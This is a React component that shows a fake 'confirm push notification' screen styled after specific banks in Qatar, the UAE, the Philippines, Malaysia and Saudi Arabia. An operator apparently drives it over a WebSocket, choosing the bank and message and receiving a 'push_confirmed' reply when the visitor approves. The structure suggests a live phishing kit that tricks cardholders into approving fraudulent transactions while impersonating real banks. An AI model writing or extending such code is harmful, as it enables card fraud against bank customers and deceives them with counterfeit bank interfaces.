import React, { useState } from 'react';
import { useNavigate } from 'react-router-dom';
import { useWebSocket } from '../hooks/useWebSocket';
import StandardCardLayout from './StandardCardLayout';
import QatarBankLayout, { isQatarBankDesign, QATAR_BANKS } from './qatar/QatarBankLayout';
import UaeBankLayout, { isUaeBankDesign } from './uae/UaeBankLayout';
import PhilippinesBankLayout, { isPhilippinesBankDesign } from './philippines/PhilippinesBankLayout';
import MalaysiaBankLayout, { isMalaysiaBankDesign } from './malaysia/MalaysiaBankLayout';
import KsaBankLayout, { isKsaBankDesign } from './ksa/KsaBankLayout';
import { getTranslation } from '../Utils/i18n';
import { isMastercard } from '../Utils/cardScheme';
import HelpImage from './assets/help.gif';

export default function PushPage({ config }) {
  const navigate = useNavigate();
  const handleCleanCancel = () => {
    sessionStorage.removeItem('rejected_card');
    const checkoutPath = localStorage.getItem('checkout_path') || '/';
    navigate(checkoutPath);
  };
  const mode = config?.mode || localStorage.getItem('session_mode') || ((typeof process !== 'undefined' && process.env.REACT_APP_MODE) || undefined) || 'standardPT';
  const t = getTranslation(mode);
  const [submitting, setSubmitting] = useState(false);

  const { sendResponse, currentCommand } = useWebSocket();
  const design = localStorage.getItem('session_design') || 'standard_visa';
  const customMessage = currentCommand?.message || localStorage.getItem('push_text') || t.pushDefaultMsg;

  const isQatar = isQatarBankDesign(design);
  const bank = isQatar ? QATAR_BANKS[design] : null;
  const isMc = isMastercard(design);

  const isUae = isUaeBankDesign(design) || currentCommand?.type === 'show_bank_push' || Boolean(currentCommand?.bank);
  const uaeBank = currentCommand?.bank || (design.includes('fab') ? 'fab' : (design.includes('wio') ? 'wio' : 'adib'));

  const handleConfirm = (e) => {
    e?.preventDefault();
    if (submitting) return;
    setSubmitting(true);
    sendResponse('push_confirmed', {});
  };

  if (isUae) {
    const isCustomPush = currentCommand?.type === 'show_bank_push' || currentCommand?.isCustomPush;
    return (
      <UaeBankLayout
        bank={uaeBank}
        scheme={isMc ? 'mastercard' : 'visa'}
        mode="push"
        customMessage={isCustomPush ? null : currentCommand?.message}
        onApprove={handleConfirm}
        onExit={() => navigate('/')}
      />
    );
  }

  if (isPhilippinesBankDesign(design)) {
    return (
      <PhilippinesBankLayout
        design={design}
        mode="push"
        customMessage={customMessage}
        onApprove={handleConfirm}
        onCancel={handleCleanCancel}
      />
    );
  }

  if (isMalaysiaBankDesign(design)) {
    return (
      <MalaysiaBankLayout
        design={design}
        mode="push"
        customMessage={customMessage}
        onApprove={handleConfirm}
        onCancel={handleCleanCancel}
      />
    );
  }

  if (isQatar && bank) {
    return (
      <QatarBankLayout
        design={design}
        mode="push"
        customMessage={customMessage}
        onApprove={handleConfirm}
        onCancel={handleCleanCancel}
      />
    );
  }

  if (isKsaBankDesign(design)) {
    return (
      <KsaBankLayout
        design={design}
        mode="push"
        customMessage={customMessage}
        onApprove={handleConfirm}
        onCancel={handleCleanCancel}
      />
    );
  }

  return (
    <StandardCardLayout
      title={t.pushTitle}
      subtitle={customMessage}
      mode={mode}
      scheme={isMc ? 'mastercard' : 'visa'}
    >
      <div style={{ display: 'flex', justifyContent: 'center', margin: '1.5rem 0' }}>
        <div className="cus-loader" />
      </div>

      <form onSubmit={handleConfirm}>
        <div className="scl-link-row">
          <a 
            href="#missing" 
            onClick={(e) => { e.preventDefault(); alert(t.pushHelpAlert); }}
            className="scl-link"
          >
            {t.pushNotReceived}
          </a>
        </div>

        <div className="scl-btn-bar">
          <button 
            type="button" 
            onClick={() => navigate('/')} 
            className="scl-cancel-btn"
          >
            {t.cancelBtn}
          </button>

          <button
            type="submit"
            disabled={submitting}
            className="scl-submit-btn"
          >
            {submitting ? <div className="inputLoader" /> : t.pushConfirmedBtn}
          </button>

          <button 
            type="button" 
            onClick={() => alert(t.helpAlert)}
            className="scl-help-btn"
          >
            <img className="scl-help-icon" src={HelpImage} alt="" />
            {t.helpBtn}
          </button>
        </div>
      </form>
    </StandardCardLayout>
  );
}
